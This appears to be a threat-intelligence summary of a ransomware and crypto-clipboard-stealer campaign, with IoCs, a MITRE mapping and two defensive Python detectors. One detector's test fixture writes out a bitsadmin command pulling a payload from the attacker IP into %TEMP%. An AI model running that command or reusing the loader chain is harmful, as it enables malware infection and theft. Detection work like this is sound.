New MortalKombat ransomware and Laplas Clipper malware threats deployed in financially motivated campaign

Unidentified threat actor(s) have deployed MortalKombat ransomware alongside a GO variant of Laplas Clipper in a financially motivated campaign since December 2022, using phishing and an automated loader to drop payloads. The operation also leverages RDP scanning and attacker-controlled download servers; victims’ cryptocurrency wallets are targeted via clipboard manipulation and ransom negotiations. #MortalKombat #LaplasClipper #Xorist #QTOX #CoinPayments #clipper.guru

Key points

  • Since December 2022, a threat actor group has deployed MortalKombat ransomware and Laplas Clipper GO variant in financially motivated campaigns.
  • Initial infection commonly begins with a phishing email impersonating CoinPayments, delivering a BAT loader that downloads and runs the payload from attacker-controlled hosting.
  • MortalKombat ransomware is analyzed as belonging to the Xorist family, encrypting files, dropping a ransom note, changing wallpaper, and deleting or corrupting certain indicators to hinder analysis.
  • Laplas Clipper GO variant acts as a clipboard stealer, monitors cryptocurrency wallet addresses, and overwrites them with attacker-controlled addresses via a Clipper bot at clipper.guru.
  • Both threats rely on download URLs (193.169.255.78 and 144.76.136.153) and attacker-controlled domains (clipper.guru, transfer.sh) for payload delivery and C2/lookup operations.
  • qTOX is used by MortalKombat for ransom communications; attackers also provide a ProtonMail address for contact.
  • Victims are predominantly in the United States, with smaller fractions in the United Kingdom, Turkey, and the Philippines.
  • MITRE-aligned techniques observed include CLI and scripting usage, registry and startup modifications, file discovery, system and registry queries, and data exfiltration over unencrypted/non-C2 channels.
  • The campaign demonstrates persistent, multi-stage infection featuring a BAT loader, staged payloads, and cleanup of traces to complicate analysis.
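The clipboard-stealer behaviour described above (a clipper watches the clipboard for wallet addresses and silently overwrites them) can be caught from the defender's side by observing the clipboard itself: a legitimate user does not copy one address and, a fraction of a second later, a different address of the same coin type. The following detector is an added example, not code from the Talos write-up or from either malware; it polls a simulated clipboard timeline (constructed values, plus the attacker Ethereum addresses listed in the IoC section) and raises an alert when a same-type address swap happens inside a short window. The address regexes are generic forms assumed for illustration; the real bot fetches its patterns from clipper.guru at runtime.

```python
import re
from dataclasses import dataclass

# Generic address shapes (assumption: the exact regexes the Laplas bot
# downloads from clipper.guru are not on the page, so generic forms are used).
ADDRESS_PATTERNS = {
    "ETH": re.compile(r"^0x[0-9a-fA-F]{40}$"),
    "BTC": re.compile(r"^(bc1[02-9ac-hj-np-z]{25,62}|[13][1-9A-HJ-NP-Za-km-z]{25,34})$"),
}

# Attacker-controlled Ethereum addresses taken from the IoC list above.
KNOWN_CLIPPER_ADDRESSES = {
    "0x516DE893B9c9430066bC1116Feaa6E09A6349d83",
    "0x516Acfd0bae6e65A45e0808c6Ae7560d9622B246",
    "0xbd0b7a89674A0CFf1870b5aC65578b39172979f9",
}


def classify(value):
    """Return the coin type a clipboard string looks like, or None."""
    value = value.strip()
    for coin, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(value):
            return coin
    return None


@dataclass
class SwapAlert:
    time: float
    coin: str
    original: str
    replaced: str
    known_ioc: bool


def detect_swaps(samples, window=2.0):
    """samples: (timestamp_seconds, clipboard_text) pairs from a polling loop.

    An alert is raised when the clipboard changes from one wallet address to a
    different address of the same type within `window` seconds, which is the
    signature of a clipper rewriting what the user just copied.
    """
    alerts = []
    prev_time, prev_value = None, None
    for now, value in samples:
        if prev_value is not None and value != prev_value:
            coin = classify(prev_value)
            if coin and classify(value) == coin and now - prev_time <= window:
                alerts.append(SwapAlert(now, coin, prev_value, value,
                                        value in KNOWN_CLIPPER_ADDRESSES))
        prev_time, prev_value = now, value
    return alerts


# Constructed clipboard timeline: the user copies an ETH address, and half a
# second later the clipboard holds one of the attacker addresses from the IoCs.
# Thirty seconds between the two BTC addresses is a normal user action, not a swap.
USER_ETH = "0xAbCdEf0123456789aBcDeF0123456789AbCdEf01"   # constructed
ATTACKER_ETH = "0x516DE893B9c9430066bC1116Feaa6E09A6349d83"  # from IoC list
SAMPLE_TIMELINE = [
    (0.0, "meeting notes"),
    (10.0, USER_ETH),
    (10.5, ATTACKER_ETH),
    (40.0, "invoice #123"),
    (60.0, "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2"),   # sample BTC address
    (90.0, "3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy"),   # sample BTC address
]

if __name__ == "__main__":
    for alert in detect_swaps(SAMPLE_TIMELINE):
        print(f"[{alert.time:>6.1f}s] {alert.coin} address swapped: "
              f"{alert.original} -> {alert.replaced} (known IoC: {alert.known_ioc})")
```

On a live host the timeline would come from polling the clipboard (for example with a Windows clipboard API binding) every few hundred milliseconds; the window should stay short, because anything longer starts flagging users who genuinely paste two addresses in a row.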

MITRE Techniques

  • [T1059] Command-Line Interface – The BAT loader script uses the living-off-the-land binary (LoLBin) bitsadmin to download a malicious ZIP file into the victim’s local user temporary folder. ‘The BAT loader script uses the living-off-the-land binary (LoLBin) bitsadmin to download a malicious ZIP file from an attacker-controlled hosting server to the victim’s machine’
  • [T1064] Scripting – The loader script inflates the downloaded ZIP in the “%TEMP%” location and drops a malicious executable with double extensions like “.PDF.EXE”. ‘Using an embedded VB script, the BAT loader script inflates the downloaded malicious ZIP in the “%TEMP%” location and drops a malicious executable file with double file extensions “.PDF.EXE”’
  • [T1106] Execution through API – The BAT loader runs the dropped payload as a process on the victim machine. ‘The BAT loader script starts the dropped malware using the Windows start command’
  • [T1197] BITS Jobs – The BAT loader uses bitsadmin, a BITS utility, to download the malicious ZIP. ‘bitsadmin to download a malicious ZIP file’
  • [T1060] Registry Run Keys / Startup Folder – MortalKombat creates a Run registry key named Alcmeter to achieve persistence. ‘HKEY_LOCAL_MACHINE…RunAlcmeter’
  • [T1112] Modify Registry – The ransomware registers its classes, icon, and file associations via registry keys. ‘registers its classes, filename extension, and icon for the encrypted files through the defaulticon registry key and shell open command keys’
  • [T1082] System Information Discovery – The Clipper workflow includes registering the victim’s machine with the Clipper bot by sending the desktop name and user ID. ‘registers the victim’s machine with the Clipper bot by sending the victim’s desktop name and user ID’
  • [T1083] File and Directory Discovery – MortalKombat discovers and maps the logical drives, enumerates files, and encrypts matches. ‘discovers and maps the logical drives… enumerates every file and matches the file extension’
  • [T1012] Query Registry – Ransomware updates registry-related keys for persistence and file handling (e.g., DefaultIcon and shell open keys). ‘shell open command keys’
  • [T1120] Peripheral Device Discovery – While not explicitly described as peripheral, the campaign enumerates files across mapped drives and external-like locations, indicating broad discovery. ‘maps the logical drives… and searches through all folders recursively’
  • [T1048.003] Exfiltration Over Unencrypted Non-C2 Protocol – The Clipper bot exchanges wallet addresses via HTTP GET requests to clipper.guru, enabling exfiltration of wallet data. ‘communication with the Clipper bot is performed using the HTTP GET method’
  • [T1486] Data Encrypted for Impact – MortalKombat encrypts numerous file types and changes file extensions, rendering files inaccessible. ‘encrypts various files on the victim machine’s filesystem’
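The loader chain and persistence mapped above (bitsadmin fetching a ZIP into %TEMP%, a double-extension executable started from %TEMP%, a Run key named Alcmeter, and cleartext HTTP to clipper.guru) are each visible in ordinary endpoint telemetry. The rule set below is an added example written for this summary, not Talos detection content; it runs over Sysmon-shaped events constructed inline (EventID 1 process creation, 3 network connection, 13 registry value set). The usernames, the `Invoice.PDF.EXE` name, the `Laplas_payload.exe` name and the full `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` path are assumptions; `E7OKC9s3llhAD13.exe`, `Alcmeter`, `193.169.255.78` and `clipper.guru` come from the IoC list.

```python
import re

# Matchers for the behaviours described in the MITRE section.
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
DOUBLE_EXT = re.compile(r"\.(pdf|doc|docx|xls|xlsx|txt|jpg|png)\.exe$", re.I)
URL = re.compile(r"https?://\S+", re.I)
# Hosts and IPs named in the summary's IoC section.
CAMPAIGN_HOSTS = {"clipper.guru", "transfer.sh", "193.169.255.78", "144.76.136.153"}

# Constructed Sysmon-like events (not real logs from the campaign).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\OUTLOOK.EXE",
     "CommandLine": r'cmd.exe /c "C:\Users\alice\Downloads\Payment_Invoice.bat"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\bitsadmin.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"bitsadmin /transfer dl http://193.169.255.78/a.zip "
                    r"C:\Users\alice\AppData\Local\Temp\a.zip"},
    {"EventID": 1, "Image": r"C:\Users\alice\AppData\Local\Temp\Invoice.PDF.EXE",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"C:\Users\alice\AppData\Local\Temp\Invoice.PDF.EXE"},
    {"EventID": 13, "Image": r"C:\Users\alice\AppData\Local\Temp\E7OKC9s3llhAD13.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Alcmeter",
     "Details": r"C:\Users\alice\AppData\Local\Temp\E7OKC9s3llhAD13.exe"},
    {"EventID": 3, "Image": r"C:\Users\alice\AppData\Local\Temp\Laplas_payload.exe",
     "DestinationHostname": "clipper.guru", "DestinationPort": 80},
    # Benign noise that must not fire.
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe notes.txt"},
    {"EventID": 3, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationHostname": "example.com", "DestinationPort": 443},
]


def evaluate(events):
    """Return a list of findings; each carries the event index, the technique
    tag used in the summary above, and a one-line reason."""
    findings = []
    for idx, ev in enumerate(events):
        eid = ev.get("EventID")
        image = ev.get("Image", "")
        if eid == 1:
            cmd = ev.get("CommandLine", "")
            # T1197: bitsadmin pulling a remote file into the user's temp folder.
            if (image.lower().endswith("bitsadmin.exe") and "/transfer" in cmd.lower()
                    and URL.search(cmd) and TEMP_DIR.search(cmd)):
                findings.append((idx, "T1197", "bitsadmin download into %TEMP%"))
            # T1064: double-extension executable launched from %TEMP%.
            if TEMP_DIR.search(image) and DOUBLE_EXT.search(image):
                findings.append((idx, "T1064", "double-extension executable run from %TEMP%"))
        elif eid == 13:
            target = ev.get("TargetObject", "")
            value_name = target.rsplit("\\", 1)[-1]
            # T1060: Run key whose data points into %TEMP%, or the named IoC value.
            if RUN_KEY.search(target) and (TEMP_DIR.search(ev.get("Details", ""))
                                           or value_name == "Alcmeter"):
                findings.append((idx, "T1060", f"Run key '{value_name}' set by {image}"))
        elif eid == 3:
            host = ev.get("DestinationHostname", "").lower()
            # T1048.003: cleartext HTTP to the clipper bot / staging hosts.
            if host in CAMPAIGN_HOSTS and ev.get("DestinationPort") == 80:
                findings.append((idx, "T1048.003", f"HTTP to campaign host {host}"))
    return findings


def technique_ids(events):
    """Sorted, de-duplicated technique tags that fired for a set of events."""
    return sorted({technique for _, technique, _ in evaluate(events)})


if __name__ == "__main__":
    for idx, technique, reason in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {technique} - {reason}")
```

The Run-key rule fires on the value name because the summary only gives the name `Alcmeter`; in production the %TEMP% data check carries the weight, since value names change between samples while a startup entry pointing at a user-writable temp directory rarely does.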

Indicators of Compromise

  • [IP Address] – 193.169.255.78 (Poland) – attacker-controlled server from which the MortalKombat ransomware is downloaded; part of the campaign’s delivery infrastructure
  • [IP Address] – 144.76.136.153 – server from which the Laplas Clipper payload is downloaded via transfer.sh
  • [Domain] – clipper.guru – Clipper bot server used for registering victims, fetching regex, and exchanging wallet addresses
  • [Domain] – transfer.sh – Host for downloading Laplas Clipper payload
  • [Domain] – CoinPayments.net (spoofed sender) – Impersonated cryptocurrency payment gateway in phishing emails
  • [Email] – [email protected] – Spoofed sender address used in phishing emails
  • [Filename] – E7OKC9s3llhAD13.exe – MortalKombat ransomware executable dropped to disk
  • [Filename] – HOW TO DECRYPT FILES.txt – Ransom note dropped alongside encryption
  • [Wallet Address] – 0x516DE893B9c9430066bC1116Feaa6E09A6349d83, 0x516Acfd0bae6e65A45e0808c6Ae7560d9622B246, 0xbd0b7a89674A0CFf1870b5aC65578b39172979f9 – attacker-controlled Ethereum addresses shown in the clipboard exchange
  • [Wallet Address] – Certain attacker-controlled Ethereum addresses received from Clipper bot in tests (e.g., 0x516Acfd0ba… and 0xbd04EeD05C…)

Read more: https://blog.talosintelligence.com/new-mortalkombat-ransomware-and-laplas-clipper-malware-threats/